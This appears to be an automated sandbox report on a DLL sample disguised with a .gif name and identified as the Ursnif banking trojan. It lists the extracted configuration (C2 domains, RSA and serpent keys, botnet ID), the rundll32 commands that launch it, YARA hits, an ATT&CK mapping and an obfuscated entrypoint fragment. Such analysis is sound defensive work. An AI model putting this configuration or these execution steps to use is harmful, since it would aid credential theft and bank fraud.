Play interactive tour

Edit tour

Analysis Report 0204.gif.dll

Overview

General Information

Sample Name:	0204.gif.dll
Analysis ID:	382565
MD5:	ad4076a9b4f10e046059151b9e1c030a
SHA1:	edfacd4d94a56d5011445cd103c6b45ae9585adf
SHA256:	01006cd1258047b9e2bd9f58b303bd22c39b7f3242db9e4111f88b9f78b9df8f
Tags:	dllGGGoziIFSBUrsnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Machine Learning detection for sample

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

PE file contains sections with non-standard names

Program does not show much activity (idle)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6104 cmdline: loaddll32.exe 'C:\Users\user\Desktop\0204.gif.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6092 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\0204.gif.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6148 cmdline: rundll32.exe 'C:\Users\user\Desktop\0204.gif.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6112 cmdline: rundll32.exe C:\Users\user\Desktop\0204.gif.dll,DllServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Ursnif

[{"RSA Public Key": "bUd4GFcFHo0e+ZYUbkHaTKXmZ1xEyxvy7Ha6j1WAZbQ7YvMdkqTfD1vHD2y2CmFTRrLK1w5iQroYI0mUpJ4xNknlY+BmJf4xpeJRxxK0RRNeRbW5unSB2vXqxvlTgz6vNZY+9zeztuP2jXKpIm0/s+YxWnsT7eWUtQtD38NlsAPtJdp+3rBxjzAWNKQj7wMA"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.275314133.0000000004B10000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000002.286549571.00000000047D0000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000002.263503134.0000000000B50000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.loaddll32.exe.b50000.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.4b10000.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.47d0000.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.3.loaddll32.exe.30b94a0.0.raw.unpack

Malware Configuration Extractor: Ursnif [{"RSA Public Key": "bUd4GFcFHo0e+ZYUbkHaTKXmZ1xEyxvy7Ha6j1WAZbQ7YvMdkqTfD1vHD2y2CmFTRrLK1w5iQroYI0mUpJ4xNknlY+BmJf4xpeJRxxK0RRNeRbW5unSB2vXqxvlTgz6vNZY+9zeztuP2jXKpIm0/s+YxWnsT7eWUtQtD38NlsAPtJdp+3rBxjzAWNKQj7wMA"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]

Multi AV Scanner detection for submitted file

Show sources

Source: 0204.gif.dll

ReversingLabs: Detection: 41%

Machine Learning detection for sample

Show sources

Source: 0204.gif.dll

Joe Sandbox ML: detected

Source: 0204.gif.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000002.275314133.0000000004B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.286549571.00000000047D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.263503134.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.b50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4b10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.47d0000.2.raw.unpack, type: UNPACKEDPE

Source: loaddll32.exe, 00000000.00000002.263622715.0000000000D7B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000002.275314133.0000000004B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.286549571.00000000047D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.263503134.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.b50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4b10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.47d0000.2.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16	2_2_03335F16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335A25	2_2_03335A25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03333A14	2_2_03333A14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03331B1E	2_2_03331B1E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0333150C	2_2_0333150C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335378	2_2_03335378
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335262	2_2_03335262
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03331967	2_2_03331967
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03332566	2_2_03332566
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03332A69	2_2_03332A69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_033331B3	2_2_033331B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_033392B2	2_2_033392B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_033388BA	2_2_033388BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03333FAB	2_2_03333FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03332FAF	2_2_03332FAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03331CD0	2_2_03331CD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_033327D4	2_2_033327D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_033343D8	2_2_033343D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_033313C5	2_2_033313C5

Source: 0204.gif.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal68.troj.winDLL@7/0@0/0

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0204.gif.dll,DllServer

Source: 0204.gif.dll

ReversingLabs: Detection: 41%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\0204.gif.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\0204.gif.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0204.gif.dll,DllServer
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\0204.gif.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\0204.gif.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0204.gif.dll,DllServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\0204.gif.dll',#1	Jump to behavior

Source: 0204.gif.dll

Static PE information: section name: .code

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], edx	2_2_03335F7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	2_2_03335F94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	2_2_03335FDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	2_2_0333604B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	2_2_03336124
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push 00000000h; mov dword ptr [esp], edi	2_2_0333614F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push 00000000h; mov dword ptr [esp], edx	2_2_0333625E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	2_2_033362B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	2_2_03336343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	2_2_0333635D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push 00000000h; mov dword ptr [esp], ebp	2_2_03336368
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	2_2_03336385
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push 00000000h; mov dword ptr [esp], edx	2_2_033363B4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	2_2_03336483
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	2_2_033364F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	2_2_033364FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	2_2_0333650A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push 00000000h; mov dword ptr [esp], edi	2_2_03336567
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push 00000000h; mov dword ptr [esp], edi	2_2_033365A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push 00000000h; mov dword ptr [esp], eax	2_2_03336610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	2_2_03336685
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx	2_2_033366C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	2_2_033366E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push 00000000h; mov dword ptr [esp], edi	2_2_03336781
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push 00000000h; mov dword ptr [esp], edx	2_2_033367B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	2_2_0333684C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	2_2_03336858
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-10h]; mov dword ptr [esp], edx	2_2_03336926
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	2_2_03336945
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	2_2_03336951
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_03335F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], edx	2_2_033369D6

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000002.275314133.0000000004B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.286549571.00000000047D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.263503134.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.b50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4b10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.47d0000.2.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_03332A69 xor edi, dword ptr fs:[00000030h]

2_2_03332A69

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\0204.gif.dll',#1

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000002.275314133.0000000004B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.286549571.00000000047D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.263503134.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.b50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4b10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.47d0000.2.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000002.275314133.0000000004B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.286549571.00000000047D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.263503134.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.b50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4b10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.47d0000.2.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection11	Rundll321	Input Capture1	Virtualization/Sandbox Evasion1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	System Information Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
0204.gif.dll	42%	ReversingLabs	Win32.Trojan.Wacatac
0204.gif.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	382565
Start date:	06.04.2021
Start time:	09:59:30
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	0204.gif.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.troj.winDLL@7/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 98.4% (good quality ratio 85.8%) Quality average: 64.1% Quality standard deviation: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 2 Number of non-executed functions: 18
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe

Simulations

Behavior and APIs

Time	Type	Description
10:00:36	API Interceptor	1x Sleep call for process: loaddll32.exe modified
10:00:48	API Interceptor	1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.424925601663985
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0204.gif.dll
File size:	140621
MD5:	ad4076a9b4f10e046059151b9e1c030a
SHA1:	edfacd4d94a56d5011445cd103c6b45ae9585adf
SHA256:	01006cd1258047b9e2bd9f58b303bd22c39b7f3242db9e4111f88b9f78b9df8f
SHA512:	39274d933091ff3d832a712a846e7f25c76a45c13d568439b50f628024ad7d762826e22208c4beff3d74aef9f2ceb8bebaaf7b4e3f9dd4792826a20f5c8c9112
SSDEEP:	1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e..)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!................ko.............................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10006f6b
Entrypoint Section:	.code
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x6066E9D0 [Fri Apr 2 09:54:24 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3f728412058b62c418b1091768b74d7b

Entrypoint Preview

Instruction
push ebx
push esi
and dword ptr [esp], 00000000h
or dword ptr [esp], ebp
mov ebp, esp
add esp, FFFFFFF8h
push esp
mov dword ptr [esp], FFFF0000h
call 00007F5AD8A54CF1h
push eax
add dword ptr [esp], 00000247h
sub dword ptr [esp], eax
push esi
mov dword ptr [esp], 00001567h
call 00007F5AD8A53C67h
push eax
or dword ptr [esp], eax
pop eax
jne 00007F5AD8A58F6Bh
pushad
push 00000000h
mov dword ptr [esp], esi
xor esi, esi
xor esi, dword ptr [ebx+0041C627h]
mov eax, esi
pop esi
push ebx
add dword ptr [esp], 40h
sub dword ptr [esp], ebx
push ebp
add dword ptr [esp], 00001000h
sub dword ptr [esp], ebp
mov dword ptr [ebp-04h], 00000000h
push dword ptr [ebp-04h]
xor dword ptr [esp], eax
push 00000000h
call dword ptr [ebx+0041F05Ch]
mov dword ptr [ebp-04h], ecx
xor ecx, dword ptr [ebp-04h]
or ecx, eax
and edi, 00000000h
xor edi, ecx
mov ecx, dword ptr [ebp-04h]
push edi
pop dword ptr [ebp-04h]
push dword ptr [ebp-04h]
pop dword ptr [ebx+0041CAEDh]
cmp ebx, 00000000h
jbe 00007F5AD8A58F5Ch
push 00000000h
add dword ptr [esp], edx
push dword ptr [ebx+0041C166h]
pop edx
add edx, ebx
mov dword ptr [ebx+0041C166h], edx
pop edx
push 00000000h
add dword ptr [esp], edx
push dword ptr [ebx+0041CECAh]
pop edx
add edx, ebx
mov dword ptr [ebx+0041CECAh], edx
pop edx
push ebp
and ebp, 00000000h
or ebp, dword ptr [ebx+0041C166h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1a000	0x64	.data
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f0fc	0x118	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1f000	0xfc	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.code	0x1000	0x185f2	0x18600	False	0.670042067308	data	6.53345039933	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x1a000	0x64	0x200	False	0.16796875	data	1.0662581269	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1b000	0x1000	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0x1c000	0x20b3	0x2200	False	0.359834558824	data	2.96025706595	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.data	0x1f000	0x7b2	0x800	False	0.45703125	data	4.70767794561	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
user32.dll	GetActiveWindow, SetWindowsHookExA, GetLayeredWindowAttributes
kernel32.dll	GetProcAddress, LoadLibraryA, VirtualProtect, VirtualAlloc, lstrlenA, lstrcatA, lstrcmpA, GetEnvironmentVariableW
ole32.dll	OleInitialize, OleQueryCreateFromData, IIDFromString, CLIPFORMAT_UserUnmarshal, OleCreateEmbeddingHelper, HDC_UserSize
msimg32.dll	AlphaBlend, TransparentBlt
comdlg32.dll	PageSetupDlgA, PrintDlgA
oledlg.dll	OleUICanConvertOrActivateAs, OleUIChangeSourceW, OleUIConvertA
comctl32.dll	CreateStatusWindow, LBItemFromPt, DPA_Create, FlatSB_ShowScrollBar, ImageList_GetFlags
oleacc.dll	IID_IAccessible, LresultFromObject
version.dll	VerFindFileW, VerInstallFileA, VerQueryValueA, VerQueryValueW
gdiplus.dll	GdipEnumerateMetafileDestPointI, GdipCreateBitmapFromHBITMAP, GdipSetPenUnit, GdipGetImageEncoders, GdipGetPathPointsI
winspool.drv	FindNextPrinterChangeNotification, ConnectToPrinterDlg, SetPrinterDataW, GetPrinterW, DeletePrinterDataExW
shell32.dll	SHGetSpecialFolderPathA
advapi32.dll	GetKernelObjectSecurity, CryptEnumProviderTypesA, RegQueryValueExW, RegisterIdleTask

Exports

Name	Ordinal	Address
DllServer	1	0x1000447b

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6104 Parent PID: 5676

General

Start time:	10:00:19
Start date:	06/04/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\0204.gif.dll'
Imagebase:	0x310000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.263503134.0000000000B50000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6092 Parent PID: 6104

General

Start time:	10:00:20
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\0204.gif.dll',#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6112 Parent PID: 6104

General

Start time:	10:00:20
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\0204.gif.dll,DllServer
Imagebase:	0x140000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
